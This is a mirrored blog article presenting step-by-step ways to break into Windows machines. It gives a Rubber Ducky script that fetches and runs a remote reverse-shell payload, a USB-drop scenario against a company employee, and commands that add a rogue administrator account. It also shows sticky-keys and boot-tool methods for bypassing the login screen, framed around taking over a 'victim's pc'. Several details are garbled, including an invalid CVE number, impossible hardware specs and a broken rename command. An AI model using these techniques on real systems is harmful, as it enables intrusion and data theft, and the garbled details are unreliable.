4

How to Hack a Windows Machine Like a Pro Hacker

 2 years ago
source link: https://hackernoon.com/how-to-hack-a-windows-machine-like-a-pro-hacker-3e1v37rz
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

How to Hack a Windows Machine Like a Pro Hacker

@morpheuslordMorpheuslord

I am an ethical hacker who learned hacking from youtube. I like to help people with the learning of necessary skills.

In this article, we are looking into the most effective and the most interesting ways that you or a hacker can hack into a Windows machine and we are going to cover topics related to the hardware, software, CVE's and all the ways you can set up them to run it successfully.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Windows is the most commonly used operating system in the market and nearly 90% of us use windows in our day-to-day life. It is a system preferred by common people as it is easy to use and comes with a wide range of products and games for gamers and common people.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Topics to cover

0 reactions
heart.png
light.png
money.png
thumbs-down.png
  • Payload injection.
  • Social Engineering.
  • Using Bash Bunny and Rubber Ducky.
  • Bypass The Login page.
  • Problems and risks faced.
  • Previous Windows vulnerability and CVE's.
  • Speed and effectiveness of Bash Bunny and Rubber Ducky.

Payload injection

Payload injection is a common practice in hacking when a hacker gets into your system he tends to create a long-term connection with the system.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

For that he needs to inject a payload into the system in this case we can use the famous Rubber Ducky and the ducky script and a server with Metasploit to do this.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Preparation:

0 reactions
heart.png
light.png
money.png
thumbs-down.png
  1. Start Metasploit apache server.
  2. Load the windows payload into the website.
  3. Keep the server open until used.
  4. Load ducky script and configure it to download and run the file from the server.

Execution:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Start Metasploit apache server:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

You need to consider that you don't know when the victim will download the file and run it so for that. I suggest you place the file in a remote location on some webpage and provide the direct download link to the rubber ducky to do the job.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

I have my personal webpage and I have hidden an Inaccessible part of the page where I have stored the .exe or the payload which I configured that gives me a reverse connection to my hacker system.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Load the windows payload into the website:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

So I have done loading it into my website and I have gained the link to it.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Keep the server open until used:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

I have a raspberry pi in my workstation that works 24/7 with really good internet with another system running the hacker machine in another raspberry pi which I have a connection with a highly secure SSH connection from which I monitor and listen from the target.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Load ducky script and configure it to download and run the file from the server:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Here is a simple ducky script that does the work for you.

0 reactions
heart.png
light.png
money.png
thumbs-down.png
REM Title: Powershell Wget & Execute            Author: Mubix                  Version: 1.2
REM Description: Opens Run menu, throws power shell string, enter. Supports HTTP/S and Proxies.
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('DOWNLOAD LINK'); Start-Process "%TEMP%\PAYLOAD NAME"
ENTER

In place of DOWNLOAD LINK add your payload download link and in place of PAYLOAD NAME give your payload name.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

This will run the code for you and it is really fast it completes its task in seconds.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

This will give a reverse TCP or HTTP connection according to your payload of choice.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Social Engineering

Our previous payload injection is a part of social engineering. So to complete the payload injection you need to at least have the system free for twenty seconds or so to do it.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

If you place the payload which does not have a lot of data is not huge in size it won't be an issue but make sure that you have the system free for about 20 seconds.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

For a better explanation let us imagine two characters A and B

0 reactions
heart.png
light.png
money.png
thumbs-down.png

A is the hacker and B is a normal software engineer in a company called Ramtech.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

One day B found a random Pendrive on the streets and picked it up out of curiosity. The Pendrive was a Rubber Ducky set up by A to hack into the companies systems using B's curiosity as the lead.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

A has set up a similar windows payload into the Rubber Ducky and when B plugs the USB in his workplace he is shocked with a sudden splash screen and nothing else and out of fear he plugs out the USB but A has received a reverse connection and has gained access into the companies system and got a chance to do a data breach.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

The above story is a really common way a hacker gets access into systems and This is known as spear Phishing where the hacker knows about B and is taking advantage of his weakness which is curiosity.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Using a Bash Bunny and a Rubber Ducky

Bash Bunny:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Bash Bunny is a Hak5 product used to automate credential grabbing, payload injection, etc.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

It is basically a Debian system with an 8Gb nano SSD a 512Gb ram and a new feature of adding a 1 Tb worth Extention via an SD card and it is announced on their youtube channel.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

You can buy it on their official website link to the store

0 reactions
heart.png
light.png
money.png
thumbs-down.png

You can use the most famous Credential Grabber from one of its huge arsenal of payloads its specialty is that capturing the password hash it cracks it with the provided password file or list.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

It's really easy to set up and does not require a high knowledge of coding.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

A link to David Bombal's video regarding credential grabber link to the video

0 reactions
heart.png
light.png
money.png
thumbs-down.png

There a lot of tools with the credential grabber like the Ducky script which allows hacking into number lock brute-forcing android hacking software and much more and works with a change in three of its switches.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

This is what Hak5 has to tell us about Bash Bunny:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

"This is done in such a way that allows the Bash Bunny to be recognized on the victim's computer as the fastest network, without drivers, automatically – locked or unlocked. As a 2 gigabit adapter with an authoritative DHCP server, the Bash Bunny obtains a low metric. This means that the computer will instantly trust the Bash Bunny with its network traffic — enabling a plethora of automated pocket network attacks undetectable by the existing infrastructure.

These bring-your-own-network attacks are cross-platform, with the Bash Bunny exploiting Mac, Linux, and Android computers with its ECM Ethernet attack mode, and Windows computers with its Microsoft proprietary RNDIS Ethernet attack mode.

Using these methods, attacks like 
QuickCreds can steal hashed credentials from locked computers in seconds. Plug the Bash Bunny into a computer, wait a few seconds and when the light is green – the trap is clean!

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Let's take a look at how the Bash Bunny pulls off this simple and effective attack.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

First, we issue the Ethernet attack mode specific to our target. If it's Windows, we'll want to use RNDIS_ETHERNET. If it's a Mac or Linux target, we'll want to use ECM_ETHERNET. Even better - if we're not sure, simply use AUTO_ETHERNET which will try both."

0 reactions
heart.png
light.png
money.png
thumbs-down.png
copied the coated content directly from the Hak5 web article
0 reactions
heart.png
light.png
money.png
thumbs-down.png

Rubber Ducky:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Rubber Ducky is a small USB-like device that can run commands like a keyboard on a victim's computer using a specific script known as ducky script.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

This is really useful in cases of brute-forcing login screens directly downloading and running payloads from the internet etc but it is not as efficient and all-in-one as the Bash Bunny But it is really effective.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

This is what Hak5 has to tell us about the Rubber Ducky:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

"A two-second HID attack against Windows and Mac that launches the website of your choosing. That's by far the most effective security awareness payload for the USB Rubber Ducky.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Cybersecurity awareness building is important, and developing an effective security awareness program - or at least raising eyebrows that one is even necessary - doesn't need to be difficult."

0 reactions
heart.png
light.png
money.png
thumbs-down.png
copied the coated content directly from the Hak5 web article
0 reactions
heart.png
light.png
money.png
thumbs-down.png

Bypass the login page

There are so many methods used by hackers to bypass login screens of windows some of them are below:

0 reactions
heart.png
light.png
money.png
thumbs-down.png
  • Using kon-boot.
  • Using the quick link menu.
  • Using the pc-unlocker.
  • Using passgeeker.
  • Using shift.

Using kon-boot:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Kon-boot is a really effective tool to use to reset the lock screen password you need to first buy the license for it I prefer you buy the 2 in 1 window and mac os bypass.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

First:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

You need to purchase the license which after the payment will be emailed to your email account.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Second:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

You need to flash the tool to a Pendrive with a minimum of 16Gb memory for better performance.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Usage:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Once you have flashed the tool to a Pendrive you can use it to flash the existing os to Bypass the login screen.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

As simple as it can get the victim's pc is now yours just change the password and use it as you wish.😊

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Link to kon-boot website www.kon-boot.com

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Link to Zaid Sabhi's tutorial youtube.com

0 reactions
heart.png
light.png
money.png
thumbs-down.png

The above tutorial from Zaid will help you a lot on kon-boot.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Using the quick link menu:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

The Quick link menu is a dropdown menu by which we can access the command prompt, Powershell, task manager, etc.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

By using

WINKEY + X 
we can call the dropdown and using the following commands we can create a new superuser for the windows machine.
0 reactions
heart.png
light.png
money.png
thumbs-down.png
net user HACKER /add
net localgroup Administrators HACKER /add

In the above code, HACKER is a new superuser for the machine and he has admin powers to manipulate things in the machine.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Using pc-un-locker tool:

Pc un-locker is a well-renowned tool for resetting the password of your device but it comes with a catch it permanently removes the device creds and may need you to reset the system please use it with caution.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

This is similar to Kon Boot just install it on a USB drive and then flash it on your pc this is only for windows and does not work with mac or any other system types.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

step1:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Download and install the program on any accessible computer (not the locked pc) just install it from the link and store it on another pc or a sandbox image for further safety.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

step2:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Run it and burn it to a blank CD /DVD or USB flash drive. Mostly use USB who uses DVD in 2021? Use USB 3.0 for more speed and if you can use a type-c USB for the job.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

step3:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Boot locked PC from the newly created disk to reset the admin password. For this, you need to boot from the Bios of the pc if you don't know how to do that just google the laptop name, version, and model, etc. And you will get all the info you need.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

There is a standard license of $29.95 which I prefer as it is better compared to the free ones but the free ones are also fine in many cases.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Using passgeeker:

Passgeeker or sysgeeker is a simple tool same as Kon Boot, Pc-unlocker and all the other programs it works on the bios flash method so no need for further explanation on this.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Using Shift:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

This is really complex and has a low chance of success but is really effective. You can do this in 2 ways I will explain both in detail the 2 methods are:

0 reactions
heart.png
light.png
money.png
thumbs-down.png
  • Social engineering
  • Windows ran into a problem

Method-1 Social engineering:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

This has to be done with speed. First, take the target's computer and then navigate to the system32 folder. And change sethc.exe to cmd.exe and cmd.exe to sethc.exe just interchange the names and that's all you have to do.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Now, when the target locks his screen, opens his laptop, and presses the shift key 5 times this will start the Sticky key feature because you have interchanged the names it will instead start Cmd for you with admin permissions. Now type the following commands:

0 reactions
heart.png
light.png
money.png
thumbs-down.png
net user USER_NAME PASSWORD /add

Then:

0 reactions
heart.png
light.png
money.png
thumbs-down.png
net localgroup administrators USER_ACCOUNT /add

It should look something like this:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Now you need to completely shut down the system after 5 to 6 min after that if it allows you to log in to the system congrats you have hacked the system.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Method-2 Windows ran into a problem:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

You can trigger this issue by force shutting down the system and cutting the power off this sometimes triggers a screen where you will be given repair options which include Command prompt. Now when you choose command prompt, it shows X:/ drive instead of C:/ for that you need to enter the following command:

0 reactions
heart.png
light.png
money.png
thumbs-down.png
cd C:

And then just copy and paste the commands from below:

0 reactions
heart.png
light.png
money.png
thumbs-down.png
cd c:\windows\system32\

and enter the command to change the names of the files:

0 reactions
heart.png
light.png
money.png
thumbs-down.png
Ren sethc.exe cmd.exe && Ren cmd.exe sethc

It should work and if it doesn't for some random case just reboot all of it you may lose the data but you get to keep the device technically it's a win if you ask me 🤔🤔🤔.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

These are the ways you can actually Bypass the login screens of the systems and these are the most effective ones out there to use and which gives the best output.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Problems and risks faced

First of all, in all of it, the most basic problem is loss of data if you are the guy who is interested in the person's data you may prefer to steal the data in other ways don't use these methods as they have the risk of losing data.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Secondly is getting caught if you are trying to hack an office machine you have the most risk of getting caught then you are at high risk and you may be jailed for this act.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Thirdly you have the chance of getting nothing like you might have no data OS then you should be happy with the hardware only.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Previous Windows vulnerability and CVE's

The most recent ones are " CVE-2021-34527269 " which is a remote code execution vulnerability with a severity of 9.0 that's the highest which is close to being critical if you are a casual person who is reading this for entertainment then Note: UPDATE YOUR SYSTEM PLEASE.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

The above CVE was copied directly from cvedetailes.com website. check for the complete list of vulnerabilities for windows from this website CVEDETAILS.COM

0 reactions
heart.png
light.png
money.png
thumbs-down.png

And check your windows update regularly.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Speed and effectiveness of Bash Bunny and Rubber Ducky

Reminding you that Rubber Ducky and Bash Bunny are from Hak5 and I have explained about them enough above. I will get to work and explain their speeds and effectiveness. And I am going to score the 2 for Reliability, compatibility, speed, effectiveness.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Bash Bunny:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Bash Bunny mark 2 is considerably fast it has a 7-sec delay and has 500 Mb of ram and 1 Tb of memory expansion and a built-in NVMe drive and that's fast compared to any other device out there and if you ask effectiveness it is super reliable in any case possible it can run Ducky scripts which makes it into a Rubber Ducky and in itself, it is a desktop and a mini pc which you can SSH into and use it and it has a wide range of payloads and tricks under its sleeves making it a clear pen-testers must needed tool. But the only downside is it is a huge thing it is bigger compared to a LAN turtle.

0 reactions
heart.png
light.png
money.png
thumbs-down.png
  • Reliability: It's very reliable in any possible case.
  • Compatibility: It's really compact for a pocket pc but in this case its size is huge.
  • Speed: It's really fast compared to Rubber Ducky and that's great.
  • Effectiveness: It's the most effective all-in-one tool for complete penetration testing.
  • Score: 5 out of 6

Rubber Ducky:

0 reactions
heart.png
light.png
money.png
thumbs-down.png

It is a really powerful tool for brute-force or any of that sort of keystroke injection and payload injection tool but in comparison to Bash Bunny it stands no chance

0 reactions
heart.png
light.png
money.png
thumbs-down.png
  • Reliability: It's very reliable in only some cases.
  • Compatibility: It's really compact and that helps it in social engineering.
  • Speed: It's really fast for keystroke injection but it is slow compared to Bash Bunny.
  • Effectiveness: It's the most effective tool for some cases like giving jump scares and starting reverse shells and all.
  • Score: 4 out of 6

In all I prefer you buy both as each one has its own special feature and all so if you can afford to buy both.

0 reactions
heart.png
light.png
money.png
thumbs-down.png

Follow me

Follow my Twitter account for the latest updates

0 reactions
heart.png
light.png
money.png
thumbs-down.png
4
heart.pngheart.pngheart.pngheart.png
light.pnglight.pnglight.pnglight.png
boat.pngboat.pngboat.pngboat.png
money.pngmoney.pngmoney.pngmoney.png
by Morpheuslord @morpheuslord. I am an ethical hacker who learned hacking from youtube. I like to help people with the learning of necessary skills.Read my stories
Join Hacker Noon

Create your free account to unlock your custom reading experience.


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK